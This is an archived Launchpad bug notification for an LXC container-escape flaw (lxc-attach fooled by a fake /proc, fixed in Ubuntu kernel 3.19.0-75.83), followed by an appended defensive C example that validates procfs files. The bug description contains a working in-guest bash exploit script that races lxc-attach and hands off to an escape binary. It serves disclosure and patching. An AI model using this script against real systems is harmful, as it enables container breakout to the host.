group.of.nepali.translators team mailing list archive
Message #09230
[Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.19.0-75.83
---------------
linux (3.19.0-75.83) vivid; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640613

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
      uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
      checks

  * CVE-2016-8658
    - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
    - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

 -- Luis Henriques <luis.henriques@xxxxxxxxxxxxx>  Wed, 09 Nov 2016 22:48:56 +0000
** Changed in: linux (Ubuntu Vivid)
Status: Fix Committed => Fix Released
** Changed in: linux (Ubuntu Xenial)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1639345
Title:
  lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat <<EOF > /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
The exploit uses a fixed fd=7 for attacking; in other test environments
it might be another fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent ptracing of lxc-attach, as it was created in another USERNS
# lsb_release -r -d
Description: Ubuntu 16.04.1 LTS
Release: 16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
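
The first fix suggested in the bug description, that lxc-attach not act on manipulated /proc data, can be illustrated by checking that an opened file really lives on procfs before its contents are used. This is an added example, not code from the bug report, from LXC or from the kernel patch; the helper names open_procfs_checked and read_cap_last_cap, the PROCFS_MAGIC macro name and the /tmp FIFO path are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/vfs.h>
#include <unistd.h>

#define PROCFS_MAGIC 0x9fa0 /* PROC_SUPER_MAGIC in <linux/magic.h> */

/* Hypothetical helper: return an fd for path only if the opened file lives on
 * procfs. O_NONBLOCK keeps a planted FIFO (mknod ... p) from stalling open();
 * checking the fd, not the path, leaves no gap between check and use. */
int open_procfs_checked(const char *path)
{
    struct statfs sfs;
    int fd = open(path, O_RDONLY | O_CLOEXEC | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (fstatfs(fd, &sfs) != 0 || sfs.f_type != PROCFS_MAGIC) {
        close(fd);
        errno = EXDEV; /* openable, but not procfs: bind mount or fake tree */
        return -1;
    }
    return fd;
}

/* Read cap_last_cap via the checked open; -1 means "do not trust this". */
long read_cap_last_cap(void)
{
    char buf[32] = {0};
    int fd = open_procfs_checked("/proc/sys/kernel/cap_last_cap");
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, sizeof(buf) - 1);
    close(fd);
    return n > 0 ? strtol(buf, NULL, 10) : -1;
}

int main(void)
{
    const char *fifo = "/tmp/fake_status_fifo"; /* constructed sample path */
    mkfifo(fifo, 0600); /* stands in for the guest's /test/self/status */
    printf("fifo accepted: %d\n", open_procfs_checked(fifo) >= 0);
    printf("cap_last_cap: %ld\n", read_cap_last_cap());
    unlink(fifo);
    return 0;
}
```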